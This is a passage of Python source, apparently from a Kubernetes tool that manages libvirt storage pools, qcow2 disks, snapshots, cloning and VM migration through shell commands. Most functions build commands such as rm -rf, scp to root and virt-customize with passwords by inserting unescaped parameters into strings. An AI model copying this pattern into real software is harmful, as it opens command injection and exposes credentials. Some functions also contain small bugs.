if pool_info['pooltype'] == 'vdiskfs':
pool_active(pool_info['pool'])
if not is_pool_started(pool_info['poolname']):
op1 = Operation("virsh pool-start", {"pool": poolname})
op1.execute()
pool_info["state"] = "active"
success_print("start pool %s successful." % params.pool, pool_info)
def autoStartPool(params):
pool_info = get_pool_info_from_k8s(params.pool)
poolname = pool_info['poolname']
if params.disable:
op = Operation("virsh pool-autostart --disable", {"pool": poolname})
op.execute()
pool_info["autostart"] = 'no'
else:
op = Operation("virsh pool-autostart", {"pool": poolname})
op.execute()
pool_info["autostart"] = 'yes'
success_print("autoStart pool %s successful." % params.pool, pool_info)
def stopPool(params):
pool_info = get_pool_info_from_k8s(params.pool)
poolname = pool_info['poolname']
if is_pool_exists(poolname) and is_pool_started(poolname):
op1 = Operation("virsh pool-destroy", {"pool": poolname})
op1.execute()
pool_info["state"] = "inactive"
success_print("stop pool %s successful." % poolname, pool_info)
def showPool(params):
pool_info = get_pool_info_from_k8s(params.pool)
poolname = pool_info['poolname']
result = get_pool_info(poolname)
if is_pool_started(poolname):
result['state'] = "active"
else:
result['state'] = "inactive"
result['content'] = pool_info["content"]
result["pooltype"] = pool_info["pooltype"]
result["pool"] = params.pool
result["free"] = result['available']
result["poolname"] = pool_info["poolname"]
result["uuid"] = pool_info['uuid']
# update pool
if not operator.eq(pool_info, result):
k8s = K8sHelper('VirtualMachinePool')
k8s.update(pool_info['pool'], 'pool', result)
success_print("show pool %s successful." % poolname, result)
def get_disk_dir(pool, vol):
pool_info = get_pool_info(pool)
if not os.path.isdir(pool_info['path']):
raise ExecuteException('', 'can not get virsh pool path.')
# create disk dir and create disk in dir.
disk_dir = "%s/%s" % (pool_info['path'], vol)
def qemu_create_disk(pool, poolname, vol, format, capacity):
pool_info = get_pool_info(poolname)
if not os.path.isdir(pool_info['path']):
raise ExecuteException('', 'can not get virsh pool path.')
# create disk dir and create disk in dir.
disk_dir = "%s/%s" % (pool_info['path'], vol)
if os.path.isdir(disk_dir):
raise ExecuteException('', 'error: disk dir has exist.')
os.makedirs(disk_dir)
disk_path = "%s/%s" % (disk_dir, vol)
op = Operation('qemu-img create -f %s %s %s' % (format, disk_path, capacity), {})
op.execute()
write_config(vol, disk_dir, disk_path, pool, poolname)
result = get_disk_info_to_k8s(poolname, vol)
return result
def createDisk(params):
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
poolname = pool_info['poolname']
result = qemu_create_disk(params.pool, poolname, params.vol, params.format, params.capacity)
uni = result["uni"]
vol_helper = K8sHelper('VirtualMachineDisk')
vol_helper.create(params.vol, 'volume', result)
success_print("create disk %s successful." % params.vol, result)
def updateOS(params):
if not is_vm_exist(params.domain):
raise ExecuteException('', 'not exist domain %s.' % params.domain)
if is_vm_active(params.domain):
raise ExecuteException('', 'domain %s is still running, plz stop it first.' % params.domain)
prepare_disk_by_path(params.source)
prepare_disk_by_path(params.target)
disks = get_disks_spec(params.domain)
os_disk_tag, os_disk_path = get_os_disk(params.domain)
if params.source not in list(disks.keys()) or disks[params.source] != os_disk_tag:
raise ExecuteException('', '%s is not in domain %s disks.' % (params.source, params.domain))
if not os.path.exists(params.source):
raise ExecuteException('', 'source file %s not exist.' % params.source)
if not os.path.exists(params.target):
raise ExecuteException('', 'target file %s not exist.' % params.target)
info = get_disk_prepare_info_by_path(params.source)
vol = info['disk']
pool = info['pool']
vol_info = get_vol_info_from_k8s(vol)
pool_info = get_pool_info_from_k8s(pool)
# disk_file_need_delete = []
snapshots_need_to_delete = []
disk_dir = '%s/%s' % (pool_info['path'], vol)
snapshots_dir = '%s/snapshots' % disk_dir
if os.path.exists(snapshots_dir):
for df in os.listdir(snapshots_dir):
try:
ss_info = get_snapshot_info_from_k8s(df)
snapshots_need_to_delete.append(df)
except:
pass
new_path = '%s/%s/%s' % (pool_info['path'], vol, vol)
op = Operation('cp -f %s %s' % (params.target, new_path), {})
op.execute()
# write_config(vol, '%s/%s' % (pool_info['path'], vol), new_path, pool, pool_info['poolname'])
for df in os.listdir(disk_dir):
try:
if os.path.isdir('%s/%s' % (disk_dir, df)):
op = Operation('rm -rf %s/%s' % (disk_dir, df), {})
op.execute()
else:
if df == 'config.json' or df == vol:
continue
else:
op = Operation('rm -f %s/%s' % (disk_dir, df), {})
op.execute()
except:
pass
change_vol_current(vol, new_path)
change_vm_os_disk_file(params.domain, params.source, new_path)
modifyVMOnNode(params.domain)
ss_helper = K8sHelper("VirtualMachineDiskSnapshot")
for ss in snapshots_need_to_delete:
if ss_helper.exist(ss):
ss_helper.delete(ss)
success_print("updateOS %s successful." % params.domain, {})
def createCloudInitUserDataImage(params):
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
poolname = pool_info['poolname']
# cfg = '/tmp/%s.cfg' % randomUUID()
# logger.debug(params.userData)
# with open(cfg, 'w') as f:
# data = ''
# for line in params.userData:
# data += line.replace(';;;', '\r\n').replace('+', '-')
# logger.debug(data)
# f.write(data)
disk_dir = '%s/%s' % (pool_info['path'], params.vol)
if not os.path.exists(disk_dir):
os.makedirs(disk_dir)
disk_path = '%s/%s' % (disk_dir, params.vol)
op = Operation('cloud-localds %s %s' % (disk_path, params.userData), {})
op.execute()
disk_prepare(poolname, params.vol, disk_path)
write_config(params.vol, disk_dir, disk_path, params.pool, poolname)
result = get_disk_info_to_k8s(poolname, params.vol)
success_print("create CloudInitUserDataImage %s successful." % params.vol, result)
def deleteCloudInitUserDataImage(params):
try:
helper = K8sHelper("VirtualMachineDisk")
disk_info = helper.get_data(params.vol, "volume")
if disk_info is None:
helper.delete(params.vol)
success_print("delete disk %s successful." % params.vol, {})
except ExecuteException as e:
error_print(400, e.message)
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
disk_info = get_vol_info_from_k8s(params.vol)
poolname = disk_info['poolname']
pool_info = get_pool_info(poolname)
disk_dir = '%s/%s' % (pool_info['path'], params.vol)
snapshots_path = '%s/snapshots' % disk_dir
with open('%s/config.json' % disk_dir, "r") as f:
config = load(f)
if os.path.exists(snapshots_path):
for file in os.listdir(snapshots_path):
if '%s/%s' % (snapshots_path, file) == config['current']:
continue
else:
try:
ss_info = get_snapshot_info_from_k8s(file)
except:
continue
raise ExecuteException('', 'error: disk %s still has snapshot %s.' % (params.vol, file))
op = Operation("rm -rf %s" % disk_dir, {})
op.execute()
helper = K8sHelper("VirtualMachineDisk")
helper.delete(params.vol)
success_print("delete CloudInitUserDataImage %s successful." % params.vol, {})
# only disks without snapshots can be deleted.
def deleteDisk(params):
disk_info = get_vol_info_from_k8s(params.vol)
poolname = disk_info['poolname']
pool_info = get_pool_info(poolname)
disk_dir = '%s/%s' % (pool_info['path'], params.vol)
snapshots_path = '%s/snapshots' % disk_dir
with open('%s/config.json' % disk_dir, "r") as f:
config = load(f)
if os.path.exists(snapshots_path):
for file in os.listdir(snapshots_path):
if '%s/%s' % (snapshots_path, file) == config['current']:
continue
else:
try:
ss_info = get_snapshot_info_from_k8s(file)
except:
continue
raise ExecuteException('', 'error: disk %s still has snapshot %s.' % (params.vol, file))
op = Operation("rm -rf %s" % disk_dir, {})
op.execute()
helper = K8sHelper("VirtualMachineDisk")
helper.delete(params.vol)
success_print("delete volume %s success." % params.vol, {})
def resizeDisk(params):
disk_info = get_vol_info_from_k8s(params.vol)
poolname = disk_info['poolname']
disk_dir = '%s/%s' % (get_pool_info(poolname)['path'], params.vol)
with open('%s/config.json' % disk_dir, "r") as f:
config = load(f)
disk_info = get_disk_info(config['current'])
size = int(params.capacity) - int(disk_info['virtual_size'])
op = Operation("qemu-img resize %s +%s" % (config['current'], str(size)), {})
op.execute()
result = get_disk_info_to_k8s(poolname, params.vol)
vol_helper = K8sHelper('VirtualMachineDisk')
vol_helper.create(params.vol, 'volume', result)
success_print("success resize disk %s." % params.vol, result)
def cloneDisk(params):
result = None
disk_heler = K8sHelper('VirtualMachineDisk')
disk_heler.delete_lifecycle(params.vol)
pool_helper = K8sHelper('VirtualMachinePool')
disk_node_name = get_node_name(disk_heler.get(params.vol))
pool_node_name = get_node_name(pool_helper.get(params.pool))
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
poolname = pool_info['poolname']
disk_info = get_vol_info_from_k8s(params.vol)
old_pool_info = get_pool_info_from_k8s(disk_info['pool'])
check_pool_active(old_pool_info)
prepareInfo = disk_prepare(disk_info['poolname'], params.vol, disk_info['uni'])
# create disk dir and create disk in dir.
disk_dir = '%s/%s' % (old_pool_info['path'], params.vol)
uuid = randomUUID().replace('-', '')
middle_disk_dir = '%s/%s' % (old_pool_info['path'], uuid)
middle_disk_path = '%s/%s' % (middle_disk_dir, params.newname)
clone_disk_dir = '%s/%s' % (pool_info['path'], params.newname)
clone_disk_path = '%s/%s' % (clone_disk_dir, params.newname)
if not os.path.exists(middle_disk_dir):
os.makedirs(middle_disk_dir)
with open('%s/config.json' % disk_dir, "r") as f:
config = load(f)
try:
op1 = Operation('cp -f %s %s' % (config['current'], middle_disk_path), {})
op1.execute()
except:
if os.path.exists(middle_disk_dir):
op3 = Operation('rm -rf %s' % middle_disk_dir, {})
op3.execute()
raise ExecuteException('', 'Copy %s to middle disk path %s failed, aborting clone.' % (config['current'], middle_disk_path))
try:
backing_file = DiskImageHelper.get_backing_file(middle_disk_path)
if backing_file:
op2 = Operation('qemu-img rebase -f %s -b "" %s' % (params.format, middle_disk_path), {})
op2.execute()
except:
if os.path.exists(middle_disk_dir):
op3 = Operation('rm -rf %s' % middle_disk_dir, {})
op3.execute()
raise ExecuteException('', 'Execute "qemu-img rebase %s" failed!, aborting clone.' % middle_disk_path)
# write config
config = {}
config['name'] = params.newname
config['dir'] = clone_disk_dir
config['current'] = clone_disk_path
config['pool'] = params.pool
config['poolname'] = pool_info['poolname']
with open('%s/config.json' % middle_disk_dir, "w") as f:
dump(config, f)
if disk_node_name == pool_node_name:
op = Operation('mv %s %s/%s' % (middle_disk_dir, pool_info['path'], params.newname), {})
op.execute()
jsondicts = get_disk_jsondict(params.pool, params.newname)
create_all_jsondict(jsondicts)
else:
ip = get_node_ip_by_node_name(pool_node_name)
op = Operation('scp -r %s root@%s:%s' % (middle_disk_dir, ip, clone_disk_dir), {})
op.execute()
op = Operation('rm -rf %s' % middle_disk_dir, {})
op.execute()
op = Operation('kubesds-adm registerDiskToK8s --pool %s --vol %s' % (params.pool, params.newname), {},
ip=ip, remote=True, with_result=True)
remote_result = op.execute()
if remote_result['result']['code'] != 0:
raise ExecuteException('RunCmdError', 'remote run cmd kubesds-adm registerDiskToK8s error.')
if result:
helper = K8sHelper("VirtualMachineDisk")
helper.create(params.newname, "volume", result)
success_print("success clone disk %s." % params.vol, result)
else:
success_print("success clone disk %s." % params.vol, {})
def registerDiskToK8s(params):
jsondicts = get_disk_jsondict(params.pool, params.vol)
create_all_jsondict(jsondicts)
success_print("success register disk %s to k8s." % params.vol, {})
# only used when migrating a disk to another node
def rebaseDiskSnapshot(params):
rebase_snapshot_with_config(params.pool, params.vol)
disk_info = get_vol_info_from_k8s(params.vol)
disk_prepare(disk_info['poolname'], disk_info['disk'], disk_info['uni'])
success_print("success rebase disk.", {})
def createDiskFromImage(params):
pool_info = get_pool_info_from_k8s(params.targetPool)
check_pool_active(pool_info)
poolname = pool_info['poolname']
dest_dir = '%s/%s' % (pool_info['path'], params.name)
dest = '%s/%s' % (dest_dir, params.name)
dest_config_file = '%s/config.json' % (dest_dir)
if not os.path.exists(dest_dir):
os.makedirs(dest_dir, 0o711)
if os.path.exists(dest_config_file):
raise Exception('Path %s already in use, aborting copy.' % dest_dir)
if params.full_copy:
try:
source_info = get_disk_info(params.source)
if source_info['format'] != 'qcow2':
op = Operation(
'qemu-img convert -f %s %s -O qcow2 %s' % (source_info['format'], params.source, dest), {})
op.execute()
else:
op = Operation('cp -f %s %s' % (params.source, dest), {})
op.execute()
except:
if os.path.exists(dest_dir):
op = Operation('rm -rf %s' % dest_dir, {})
op.execute()
raise Exception('Copy %s to %s failed!' % (params.source, dest))
try:
dest_info = get_disk_info(dest)
if dest_info['format'] == 'qcow2':
op = Operation('qemu-img rebase -f qcow2 %s -b "" -u' % (dest), {})
op.execute()
except:
if os.path.exists(dest_dir):
op = Operation('rm -rf %s' % dest_dir, {})
op.execute()
raise Exception('Execute "qemu-img rebase -f qcow2 %s" failed!' % (dest))
else:
if params.source.find('snapshots') >= 0:
source_disk_dir = os.path.dirname(os.path.dirname(params.source))
else:
source_disk_dir = os.path.dirname(params.source)
config = get_disk_config_by_path('%s/config.json' % source_disk_dir)
disk_info = get_disk_info(config['current'])
op = Operation(
'qemu-img create -f qcow2 -b %s -F %s %s' %
(config['current'], disk_info['format'], dest), {})
op.execute()
write_config(params.name, dest_dir, dest, params.targetPool, poolname)
result = get_disk_info_to_k8s(poolname, params.name)
helper = K8sHelper("VirtualMachineDisk")
helper.update(params.name, "volume", result)
success_print("success createDiskFromImage %s." % params.name, result)
def disk_prepare(pool, vol, uni):
# prepare: make sure the pool that owns this volume is mounted on this node
logger.debug(pool)
logger.debug(vol)
logger.debug(uni)
dp = None
try:
vol_info = get_vol_info_from_k8s(vol)
dp = vol_info['pool']
except:
ss_info = get_snapshot_info_from_k8s(vol)
dp = ss_info['pool']
# pool_info = get_pool_info_from_k8s(vol_info['pool'])
# op = Operation('vdisk-prepare ', {'poolname': pool, 'name': vol,
# 'uni': uni}, with_result=True)
auto_mount(dp)
def remote_disk_prepare(ip, pool, vol, uni):
# remote prepare: ask kubesds-adm on the remote node to prepare the disk
op = Operation('kubesds-adm prepareDisk ', {'vol': vol}, remote=True, ip=ip, with_result=True)
cstor = op.execute()
if cstor['result']['code'] != 0:
raise ExecuteException('',
'remote prepare disk fail. cstor raise exception: cstor error code: %d, msg: %s, obj: %s' % (
cstor['result']['code'], cstor['result']['msg'], cstor['obj']))
return cstor
def prepareDisk(params):
if params.domain:
disk_paths = list(get_disks_spec(params.domain).keys())
logger.debug(disk_paths)
for path in disk_paths:
prepare_disk_by_path(path)
if params.vol:
prepare_disk_by_metadataname(params.vol)
if params.path:
prepare_disk_by_path(params.path)
success_print("prepare disk successful.", {})
def releaseDisk(params):
if params.domain:
disk_paths = list(get_disks_spec(params.domain).keys())
logger.debug(disk_paths)
for path in disk_paths:
release_disk_by_path(path)
if params.vol:
release_disk_by_metadataname(params.vol)
if params.path:
release_disk_by_path(params.path)
success_print("success release disk %s." % params.vol, {})
def showDisk(params):
pool_info = get_pool_info_from_k8s(params.pool)
poolname = pool_info['poolname']
result = get_disk_info_to_k8s(poolname, params.vol)
success_print("show disk %s success." % params.pool, result)
def showDiskSnapshot(params):
if params.type == "localfs" or params.type == "nfs" or params.type == "glusterfs" or params.type == "vdiskfs":
ss_info = get_snapshot_info_from_k8s(params.name)
poolname = ss_info['poolname']
disk_config = get_disk_config(poolname, params.vol)
ss_path = '%s/snapshots/%s' % (disk_config['dir'], params.name)
result = get_snapshot_info_to_k8s(poolname, params.vol, params.name)
success_print("success show disk snapshot %s." % params.name, result)
def createExternalSnapshot(params):
disk_info = get_vol_info_from_k8s(params.vol)
poolname = disk_info['poolname']
disk_prepare(poolname, params.vol, disk_info['uni'])
disk_config = get_disk_config(poolname, params.vol)
if params.domain is None:
if check_disk_in_use(disk_config['current']):
raise ExecuteException('', 'disk in using, current file %s is using by another process, '
'is there a vm using the current file, plz check.' % disk_config['current'])
ss_dir = '%s/snapshots' % disk_config['dir']
if not os.path.exists(ss_dir):
os.makedirs(ss_dir)
ss_path = '%s/%s' % (ss_dir, params.name)
op1 = Operation('qemu-img create -f %s -b %s -F %s %s' %
(params.format, disk_config['current'], params.format, ss_path), {})
op1.execute()
with open('%s/config.json' % disk_config['dir'], "r") as f:
config = load(f)
config['current'] = ss_path
with open('%s/config.json' % disk_config['dir'], "w") as f:
dump(config, f)
else:
specs = get_disks_spec(params.domain)
if disk_config['current'] not in list(specs.keys()):
logger.debug('disk %s current is %s.' % (params.vol, disk_config['current']))
raise ExecuteException('', 'domain %s not has disk %s' % (params.domain, params.vol))
vm_disk = specs[disk_config['current']]
ss_path = '%s/snapshots/%s' % (disk_config['dir'], params.name)
ss_dir = '%s/snapshots' % disk_config['dir']
if not os.path.exists(ss_dir):
os.makedirs(ss_dir)
not_need_snapshot_spec = ''
for disk_path in list(specs.keys()):
if disk_path == disk_config['current']:
continue
not_need_snapshot_spec = not_need_snapshot_spec + '--diskspec %s,snapshot=no ' % specs[disk_path]
# '/var/lib/libvirt/pooltest3/wyw123/snapshots/wyw123.6'
# 'vdb,snapshot=no'
op = Operation('virsh snapshot-create-as --domain %s --name %s --atomic --disk-only --no-metadata '
'--diskspec %s,snapshot=external,file=%s,driver=%s %s' %
(params.domain, params.name, vm_disk, ss_path, params.format, not_need_snapshot_spec),
{})
op.execute()
config_path = '%s/config.json' % os.path.dirname(ss_dir)
with open(config_path, "r") as f:
config = load(f)
config['current'] = ss_path
with open(config_path, "w") as f:
dump(config, f)
result = get_snapshot_info_to_k8s(poolname, params.vol, params.name)
# modify disk in k8s
modify_disk_info_in_k8s(poolname, params.vol)
vol_helper = K8sHelper('VirtualMachineDiskSnapshot')
vol_helper.create(params.name, 'volume', result)
success_print("success create disk external snapshot %s" % params.name, result)
# revertExternalSnapshot: create a new leaf image on top of the chosen snapshot's backing file and make it the disk's current image
def revertExternalSnapshot(params):
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
poolname = pool_info['poolname']
helper = K8sHelper("VirtualMachineDiskSnapshot")
k8s_ss_info = helper.get_data(params.name, "volume")
backing_file = k8s_ss_info['full_backing_filename']
disk_prepare(poolname, params.vol, pool_info['url'])
if params.domain and is_vm_active(params.domain):
raise ExecuteException('', 'domain %s is still active, plz stop it first.' % params.domain)
disk_config = get_disk_config(poolname, params.vol)
if check_disk_in_use(disk_config['current']):
raise ExecuteException('', 'error: current disk in use, plz check or set real domain field.')
ss_path = '%s/snapshots/%s' % (disk_config['dir'], params.name)
if ss_path is None:
raise ExecuteException('', 'error: can not get snapshot backing file.')
uuid = randomUUID().replace('-', '')
new_file_path = '%s/%s' % (os.path.dirname(backing_file), uuid)
op1 = Operation('qemu-img create -f %s -b %s -F %s %s' %
(params.format, backing_file, params.format, new_file_path), {})
op1.execute()
# change vm disk
if params.domain and not change_vm_os_disk_file(params.domain, disk_config['current'], new_file_path):
op2 = Operation('rm -f %s' % new_file_path, {})
op2.execute()
raise ExecuteException('', 'can not change disk source in domain xml')
# modify json file, make os_event_handler to modify data on api server .
with open('%s/config.json' % disk_config['dir'], "r") as f:
config = load(f)
config['current'] = new_file_path
with open('%s/config.json' % disk_config['dir'], "w") as f:
dump(config, f)
# modify disk in k8s
modify_disk_info_in_k8s(poolname, params.vol)
# delete lifecycle
helper.delete_lifecycle(params.name)
success_print("success revert disk external snapshot %s." % params.name, {})
def deleteExternalSnapshot(params):
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
poolname = pool_info['poolname']
helper = K8sHelper("VirtualMachineDiskSnapshot")
k8s_ss_info = helper.get_data(params.name, "volume")
backing_file = k8s_ss_info['full_backing_filename']
# prepare base
disk_prepare(poolname, params.vol, pool_info['url'])
if params.domain:
specs = get_disks_spec(params.domain)
disk_config = get_disk_config(poolname, params.vol)
if disk_config['current'] not in list(specs.keys()):
raise ExecuteException('', 'domain %s not has disk %s' % (params.domain, params.vol))
disk_config = get_disk_config(poolname, params.vol)
# collect all snapshots to delete (those whose backing chain contains backing_file), except current.
snapshots_to_delete = []
files = os.listdir('%s/snapshots' % disk_config['dir'])
for df in files:
try:
bf_paths = get_sn_chain_path('%s/snapshots/%s' % (disk_config['dir'], df))
if backing_file in bf_paths:
snapshots_to_delete.append(df)
except:
continue
# if snapshot to delete is current, delete vmsn from server.
if params.name not in snapshots_to_delete:
snapshots_to_delete.append(params.name)
if backing_file in get_sn_chain_path(disk_config['current']):
if params.domain and is_vm_active(params.domain):
current_backing_file = DiskImageHelper.get_backing_file(disk_config['current'])
# reconnect the snapshot chain
bf_bf_path = DiskImageHelper.get_backing_file(backing_file)
if bf_bf_path:
op = Operation('virsh blockpull --domain %s --path %s --base %s --wait' %
(params.domain, disk_config['current'], backing_file), {})
op.execute()
else:
op = Operation('virsh blockpull --domain %s --path %s --wait' %
(params.domain, disk_config['current']), {})
op.execute()
op = Operation('rm -f %s' % backing_file, {})
op.execute()
# # if the snapshot to delete is not current, delete snapshot's backing file
# if current_backing_file != backing_file:
# op = Operation('rm -f %s' % backing_file, {})
# op.execute()
else:
current_backing_file = DiskImageHelper.get_backing_file(disk_config['current'])
# reconnect the snapshot chain
paths = get_sn_chain_path(disk_config['current'])
if backing_file in paths:
bf_bf_path = DiskImageHelper.get_backing_file(backing_file)
if bf_bf_path:
# current is affected and the backing file is not the chain head: rebase current onto its grandparent to reconnect the chain
op = Operation('qemu-img rebase -b %s %s' % (bf_bf_path, disk_config['current']), {})
op.execute()
else:
# current is affected and the backing file is the chain head: rebase current onto nothing so it becomes standalone
op = Operation('qemu-img rebase -b "" %s' % disk_config['current'], {})
op.execute()
op = Operation('rm -f %s' % backing_file, {})
op.execute()
# # if the snapshot to delete is not current, delete snapshot's backing file
# if current_backing_file != backing_file:
# op = Operation('rm -f %s' % backing_file, {})
# op.execute()
for df in snapshots_to_delete:
if df != os.path.basename(disk_config['current']):
op = Operation('rm -f %s/snapshots/%s' % (disk_config['dir'], df), {})
op.execute()
# modify json file, make os_event_handler to modify data on api server .
with open('%s/config.json' % disk_config['dir'], "r") as f:
config = load(f)
config['current'] = config['current']  # no-op; rewriting config.json makes os_event_handler resync the api server
with open('%s/config.json' % disk_config['dir'], "w") as f:
dump(config, f)
# delete snapshot in k8s
for ss in snapshots_to_delete:
helper.delete(ss)
# modify disk current info in k8s
modify_disk_info_in_k8s(poolname, params.vol)
# result = {'delete_ss': snapshots_to_delete, 'disk': disk_config['name'],
# 'need_to_modify': config['current'], "pool": params.pool, "poolname": poolname}
success_print("success delete disk external snapshot %s." % params.name, {})
def updateDiskCurrent(params):
for current in params.current:
if params.current.find("snapshots") > 0:
config_path = '%s/config.json' % os.path.dirname(os.path.dirname(current))
else:
config_path = '%s/config.json' % os.path.dirname(current)
with open(config_path, "r") as f:
config = load(f)
config['current'] = current
with open(config_path, "w") as f:
dump(config, f)
success_print("updateDiskCurrent successful.", {})
def customize(params):
if params.user and params.password:
op = Operation('virt-customize --add %s --password %s:password:%s' % (params.add, params.user, params.password),
{})
op.execute()
elif params.ssh_inject:
cmd = 'virt-customize --add %s --ssh-inject \"%s\"' % (params.add, params.ssh_inject)
# print cmd
op = Operation(cmd, {})
op.execute()
else:
raise ExecuteException('', 'plz give right args and value.')
success_print("customize successful.", {})
def migrate(params):
if not is_vm_disk_driver_cache_none(params.domain):
raise ExecuteException('', 'error: disk driver cache is not none')
# if not is_vm_disk_not_shared_storage(params.domain):
# raise ExecuteException('', 'error: still has disk not create in shared storage.')
if params.ip in get_host_IP():
raise ExecuteException('', 'error: not valid ip address.')
# prepare all disk
specs = get_disks_spec(params.domain)
for disk_path in list(specs.keys()):
remote_prepare_disk_by_path(params.ip, disk_path)
if params.offline:
op = Operation('virsh migrate --offline --undefinesource --persistent %s qemu+ssh://%s/system tcp://%s' % (
params.domain, params.ip, params.ip), {})
op.execute()
else:
op = Operation('virsh migrate --live --undefinesource --persistent %s qemu+ssh://%s/system tcp://%s' % (
params.domain, params.ip, params.ip), {})
op.execute()
# get disk node label in ip
node_name = get_node_name_by_node_ip(params.ip)
logger.debug("node_name: %s" % node_name)
if node_name:
all_jsondicts = []
logger.debug(specs)
for disk_path in list(specs.keys()):
prepare_info = get_disk_prepare_info_by_path(disk_path)
pool_info = get_pool_info_from_k8s(prepare_info['pool'])
# check_pool_active(pool_info)
pools = get_pools_by_path(pool_info['path'])
# change disk node label in k8s.
targetPool = None
for pool in pools:
if pool['host'] == node_name:
targetPool = pool['pool']
remote_start_pool(params.ip, targetPool)
if targetPool:
logger.debug("targetPool is %s." % targetPool)
if pool_info['pooltype'] in ['localfs', 'nfs', 'glusterfs']:
config = get_disk_config(pool_info['poolname'], prepare_info['disk'])
write_config(config['name'], config['dir'], config['current'], targetPool, config['poolname'])
jsondicts = get_disk_jsondict(targetPool, prepare_info['disk'])
all_jsondicts.extend(jsondicts)
else:
jsondicts = get_disk_jsondict(targetPool, prepare_info['disk'])
all_jsondicts.extend(jsondicts)
apply_all_jsondict(all_jsondicts)
success_print("migrate vm %s successful." % params.domain, {})
def changeDiskPool(params):
if not os.path.exists(params.xml):
raise ExecuteException('RunCmdError', 'can not find vm xml file: %s.' % params.xml)
# get disk node label in ip
node_name = get_hostname_in_lower_case()
# node_name = get_node_name_by_node_ip(params.ip)
logger.debug("node_name: %s" % node_name)
specs = get_disks_spec_by_xml(params.xml)
all_jsondicts = []
logger.debug(specs)
for disk_path in list(specs.keys()):
prepare_info = get_disk_prepare_info_by_path(disk_path)
pool_info = get_pool_info_from_k8s(prepare_info['pool'])
# check_pool_active(pool_info)
pools = get_pools_by_path(pool_info['path'])
logger.debug("pools: %s" % dumps(pools))
logger.debug("node_name: %s" % node_name)
# change disk node label in k8s.
targetPool = None
for pool in pools:
if pool['host'] == node_name:
targetPool = pool['pool']
if targetPool:
logger.debug("targetPool is %s." % targetPool)
pool_active(pool_info['pool'])
if pool_info['pooltype'] in ['localfs', 'nfs', 'glusterfs', 'vdiskfs']:
# if pool_info['pooltype'] == 'vdiskfs':
# pool_active(pool_info['pool'])
config = get_disk_config(pool_info['poolname'], prepare_info['disk'])
write_config(config['name'], config['dir'], config['current'], targetPool, config['poolname'])
jsondicts = get_disk_jsondict(targetPool, prepare_info['disk'])
all_jsondicts.extend(jsondicts)
else:
jsondicts = get_disk_jsondict(targetPool, prepare_info['disk'])
all_jsondicts.extend(jsondicts)
else:
raise ExecuteException('RunCmdError',
'can not find pool %s on node %s.' % (pool_info['poolname'], node_name))
apply_all_jsondict(all_jsondicts)
success_print("register vm disk %s successful.", {})
def migrateDiskFunc(sourceVol, targetPool):
disk_info = get_vol_info_from_k8s(sourceVol)
# prepare disk
prepareInfo = disk_prepare(disk_info['poolname'], sourceVol, disk_info['uni'])
source_pool_info = get_pool_info_from_k8s(disk_info['pool'])
pool_info = get_pool_info_from_k8s(targetPool)
logger.debug(disk_info)
logger.debug(pool_info)
if source_pool_info['poolname'] != pool_info['poolname']:
check_pool_active(source_pool_info)
disk_heler = K8sHelper('VirtualMachineDisk')
disk_heler.delete_lifecycle(sourceVol)
pool_helper = K8sHelper('VirtualMachinePool')
pool_node_name = get_node_name(pool_helper.get(targetPool))
disk_node_name = get_node_name(disk_heler.get(sourceVol))
if disk_node_name != pool_node_name:
ip = get_node_ip_by_node_name(pool_node_name)
remote_start_pool(ip, targetPool)
# same pool ignore
if disk_info['pool'] == pool_info['pool']:
logger.debug('disk %s has been in pool %s' % (sourceVol, targetPool))
return
logger.debug(pool_info['pooltype'])
if pool_info['pooltype'] in ['localfs', 'nfs', 'glusterfs', "vdiskfs"]:
if source_pool_info['pooltype'] in ['localfs', 'nfs', 'glusterfs', "vdiskfs"]: # file to file
source_dir = '%s/%s' % (get_pool_info(disk_info['poolname'])['path'], sourceVol)
if pool_node_name == disk_node_name:
if disk_info['poolname'] != pool_info['poolname']:
# cp and rebase backing file and config, then update k8s
op = Operation('cp -rf %s %s/' % (source_dir, pool_info['path']), {})
op.execute()
rebase_snapshot_with_config(targetPool, sourceVol)
disk_info = get_vol_info_from_k8s(sourceVol)
disk_prepare(pool_info['poolname'], sourceVol, disk_info['uni'])
op = Operation('rm -rf %s' % source_dir, {})
op.execute()
else:
if pool_info['pooltype'] in ['nfs', 'glusterfs', 'vdiskfs'] and disk_info['poolname'] == pool_info['poolname']:
# just change pool, label and nodename
if pool_info['pooltype'] == 'vdiskfs':
try:
ip = get_node_ip_by_node_name(pool_node_name)
remote_start_pool(ip, targetPool)
except:
pass
else:
config = get_disk_config(pool_info['poolname'], sourceVol)
write_config(sourceVol, config['dir'], config['current'], targetPool, pool_info['poolname'])
ip = get_node_ip_by_node_name(pool_node_name)
disk_info = get_vol_info_from_k8s(sourceVol)
remote_disk_prepare(ip, pool_info['poolname'], sourceVol, disk_info['uni'])
jsondicts = get_disk_jsondict(targetPool, sourceVol)
apply_all_jsondict(jsondicts)
else:
# scp
ip = get_node_ip_by_node_name(pool_node_name)
op = Operation('scp -r %s root@%s:%s/' % (source_dir, ip, pool_info['path']), {})
op.execute()
op = Operation('kubesds-adm rebaseDiskSnapshot --pool %s --vol %s' % (targetPool, sourceVol), {},
ip=ip, remote=True, with_result=True)
remote_result = op.execute()
if remote_result['result']['code'] != 0:
raise ExecuteException('RunCmdError', 'remote run cmd kubesds-adm rebaseDiskSnapshot error.')
op = Operation('rm -rf %s' % source_dir, {})
op.execute()
else: # dev to file
disk_prepare(disk_info['poolname'], sourceVol, disk_info['uni'])
this_node_name = get_hostname_in_lower_case()
logger.debug('this_node_name: %s' % this_node_name)
if pool_node_name == this_node_name: # in same node, create file then convert.
target_disk_dir = '%s/%s' % (pool_info['path'], sourceVol)
if not os.path.exists(target_disk_dir):
os.makedirs(target_disk_dir)
target_disk_file = '%s/%s' % (target_disk_dir, sourceVol)
op = Operation(
'qemu-img convert -f raw %s -O qcow2 %s' % (prepareInfo['data']['path'], target_disk_file), {})
op.execute()
write_config(sourceVol, target_disk_dir, target_disk_file, targetPool, pool_info['poolname'])
result = get_disk_info_to_k8s(pool_info['poolname'], sourceVol)
disk_heler.update(sourceVol, 'volume', result)
else:
# remote prepare disk, then migrate disk in remote node
pools = get_pools_by_poolname(pool_info['poolname'])
# change disk node label in k8s.
remote_dev_pool = None
for pool in pools:
if pool['host'] == pool_node_name:
